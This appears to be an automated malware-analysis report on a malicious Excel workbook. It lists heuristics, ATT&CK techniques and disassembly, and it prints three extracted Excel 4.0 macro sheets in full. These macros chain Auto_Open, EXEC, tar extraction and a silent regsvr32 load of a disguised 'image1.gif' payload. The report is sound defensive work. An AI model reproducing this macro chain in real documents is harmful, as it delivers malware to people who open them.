MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate/Decode Files or Information
The sample is an Excel document containing Excel 4.0 macros, which are known to be used for malicious purposes. The document body contains a lure to 'enable editing and content mode for invoice calculation', indicating a social engineering attempt. The macros utilize dangerous functions like EXEC and GOTO, and references to LoadLibrary and GetProcAddress APIs suggest dynamic payload loading. The presence of hidden sheets and the Auto_Open defined name further support malicious intent.
Heuristics 9
-
Excel 4.0 macro sheet (3 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEETSpreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
-
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAMEWorkbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
-
Dangerous XLM formula APIs: GOTO, EXEC, HALT critical OOXML_XLM_DANGEROUS_FNExcel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
-
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
Attempted x86 opcode disassembly0008946E 64a130000000 mov eax, dword ptr fs:[0x30] 00089474 894508 mov dword ptr [ebp + 8], eax 00089477 8b4d08 mov ecx, dword ptr [ebp + 8] 0008947A 8b5618 mov edx, dword ptr [esi + 0x18] 0008947D 895108 mov dword ptr [ecx + 8], edx 00089480 8b4e04 mov ecx, dword ptr [esi + 4] 00089483 8b4928 mov ecx, dword ptr [ecx + 0x28] 00089486 034e18 add ecx, dword ptr [esi + 0x18] 00089489 ffd1 call ecx 0008948B 6a00 push 0 0008948D ff563c call dword ptr [esi + 0x3c] 00089490 33c0 xor eax, eax 00089492 40 inc eax 00089493 eb02 jmp 0x89497 00089495 33c0 xor eax, eax 00089497 5e pop esi 00089498 c9 leave 00089499 c20400 ret 4 0008949C 55 push ebp 0008949D 8bec mov ebp, esp 0008949F 51 push ecx 000894A0 8b423c mov eax, dword ptr [edx + 0x3c] 000894A3 56 push esi 000894A4 8bf1 mov esi, ecx 000894A6 57 push edi 000894A7 8b441050 mov eax, dword ptr [eax + edx + 0x50] 000894AB 89460c mov dword ptr [esi + 0xc], eax 000894AE b84d5a0000 mov eax, 0x5a4d 000894B3 895608 mov dword ptr [esi + 8], edx 000894B6 8916 mov dword ptr [esi], edx 000894B8 663902 cmp word ptr [edx], ax 000894BB 755c jne 0x89519 000894BD 8b423c mov eax, dword ptr [edx + 0x3c] 000894C0 bf50450000 mov edi, 0x4550 000894C5 03c2 add eax, edx 000894C7 894604 mov dword ptr [esi + 4], eax 000894CA 3938 cmp dword ptr [eax], edi 000894CC 754b jne 0x89519
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEETExcel workbook contains 4 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_sheet_00.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 1750 bytes |
SHA-256: 16906c43ea71e7ceb95d2718eec32533a2cb6af3357ce8a6142e8a664da0db88 |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{92BAA9A6-CCD7-4C96-B244-8027D75B3DA4}"><dimension ref="H22:I28"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="10.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="10.5703125" style="2"/><col min="8" max="8" width="16.85546875" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="10.5703125" style="2"/></cols><sheetData><row r="22" spans="8:9" x14ac:dyDescent="0.25"><c r="I22" s="2" t="s"><v>2</v></c></row><row r="23" spans="8:9" x14ac:dyDescent="0.25"><c r="H23" s="2" t="b"><f>SAVE.COPY.AS(I22&I23)</f><v>0</v></c><c r="I23" s="2" t="s"><v>1</v></c></row><row r="28" spans="8:9" x14ac:dyDescent="0.25"><c r="H28" s="2" t="e"><f>GOTO(Nolaert!AK19)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
|
|||
xlm_sheet_01.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.xml | 1804 bytes |
SHA-256: e2fec034a628c75b94d784ea44c3bdf63c9845b3332fd933121ee06574678413 |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0200-000000000000}"><dimension ref="AK703:AK717"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="13.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="36" width="13.140625" style="2"/><col min="37" max="37" width="37.42578125" style="2" bestFit="1" customWidth="1"/><col min="38" max="16384" width="13.140625" style="2"/></cols><sheetData><row r="703" spans="37:37" x14ac:dyDescent="0.25"><c r="AK703" s="2" t="b"><f>EXEC(Bkidydj!L15&Bkidydj!L16&Bkidydj!L17)=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="706" spans="37:37" x14ac:dyDescent="0.25"><c r="AK706" s="2" t="b"><f>WAIT(NOW()+"00:00:05")</f><v>0</v></c></row><row r="717" spans="37:37" x14ac:dyDescent="0.25"><c r="AK717" s="2" t="e"><f>GOTO(Bkidydj!G5)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
|
|||
xlm_sheet_02.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet3.xml | 2500 bytes |
SHA-256: 87996b59ffebeefde3dcf4d7e31b5ec87828cc38534aa7743553950f90963dec |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{72FD7C7A-A3BA-4BD4-A707-DDD14281DB2B}"><dimension ref="E14:L30"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="4" width="9.140625" style="2"/><col min="5" max="5" width="27.5703125" style="2" customWidth="1"/><col min="6" max="6" width="9.140625" style="2"/><col min="7" max="7" width="13.28515625" style="2" bestFit="1" customWidth="1"/><col min="8" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="14" spans="7:12" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="G14" s="2" t="b"><f>EXEC(E29&E30)</f><v>0</v></c></row><row r="15" spans="7:12" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="L15" s="2" t="str"><f>"tar -x"</f><v>tar -x</v></c></row><row r="16" spans="7:12" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="L16" s="2" t="str"><f>"f ..\"</f><v>f ..\</v></c></row><row r="17" spans="5:12" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="L17" s="2" t="str"><f>"Nioka.meposv -C ..\"</f><v>Nioka.meposv -C ..\</v></c></row><row r="19" spans="5:12" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="G19" s="2" t="b"><f>HALT()</f><v>0</v></c></row><row r="29" spans="5:12" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="E29" s="2" t="str"><f>"Regs"</f><v>Regs</v></c></row><row r="30" spans="5:12" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="E30" s="2" t="str"><f>"vr32 -s ..\xl\media\image1.gif"</f><v>vr32 -s ..\xl\media\image1.gif</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.